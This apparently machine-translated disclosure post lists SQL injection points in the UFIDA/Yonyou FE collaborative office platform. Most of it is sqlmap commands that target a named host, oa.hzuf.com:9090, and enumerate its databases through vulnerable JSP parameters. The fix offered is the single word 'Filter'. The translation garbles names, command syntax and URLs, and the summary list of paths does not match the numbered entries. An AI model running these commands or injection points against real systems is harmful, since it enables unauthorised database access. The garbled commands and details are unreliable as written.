UFIDA general system vulnerability packaging 2
UFIDA general system vulnerability packaging #2
After a day, we packed the detected vulnerabilities together.
A total of 11 SQL injection vulnerabilities are included in the general system vulnerability package of uyou FE collaborative office platform.
The vulnerability files and parameters are:
/common/selectUDR.jsp?id=1/common/selectMoreOrganizeTree.jsp?id=1/common/selectPlanShares.jsp?id=1/document/file_publish_open.jsp?id=1/cooperate/flow/loadInforData.jsp?guid=11/carManager/carUseDetailList.jsp?CAR_BRAND_NO=1/permissionsreport/pMonitor.jsp?photoId=1&modelid=111/sysform/019/vacationCount.jsp?isOnly=1&VA02=1/sysform/042/check.jsp?id=1&name=2/system/monitorright/monitor_right_add.jsp?id=1/witapprovemanage/report/depReimburse.jsp?depid=1
1) SQL injection 1
/Fenc/syncbasedoc. jsp? Pk_corp = 1111 & opt = sync
Sqlmap-u "http://oa.hzuf.com: 9090/fenc/syncbasedoc. jsp? Pk_corp = 1111 & opt = sync"
2) SQL injection 2
/Fenc/ncsubjass. jsp? Subjcode = 1
Sqlmap-u "http://oa.hzuf.com: 9090/fenc/ncsubjass. jsp? Subjcode = 1"
3) SQL injection 3
/Document/file_publish_open.jsp? Id = 1
Sqlmap-u "http://oa.hzuf.com: 9090/document/file_publish_open.jsp? Id = 1"
4) SQL injection 4
/Common/selectMoreOrganizeTree. jsp? Id = 1
Sqlmap-u "http://oa.hzuf.com: 9090/common/selectMoreOrganizeTree. jsp? Id = 1"
5) SQL injection 5
/Cooperate/flow/loadInforData. jsp? Guid = 11
Sqlmap-u "http://oa.hzuf.com: 9090/cooperate/flow/loadInforData. jsp? Guid = 11"
6) SQL Injection 6
/CarManager/carUseDetailList. jsp? CAR_BRAND_NO = 1
Sqlmap-u "http://oa.hzuf.com: 9090/carManager/carUseDetailList. jsp? CAR_BRAND_NO = 1"
Other examples are not listed here...
SQLMAP running data
Sqlmap-u "http://oa.hzuf.com: 9090/fenc/syncbasedoc. jsp? Pk_corp = 1111 & opt = sync "-- dbs
Sqlmap-u "http://oa.hzuf.com: 9090/fenc/ncsubjass. jsp? Subjcode = 1"
Sqlmap-u "http://oa.hzuf.com: 9090/document/file_publish_open.jsp? Id = 1 "-- dbs
Sqlmap-u "http://oa.hzuf.com: 9090/cooperate/flow/loadInforData. jsp? Guid = 11 "-- dbs
Solution:
Filter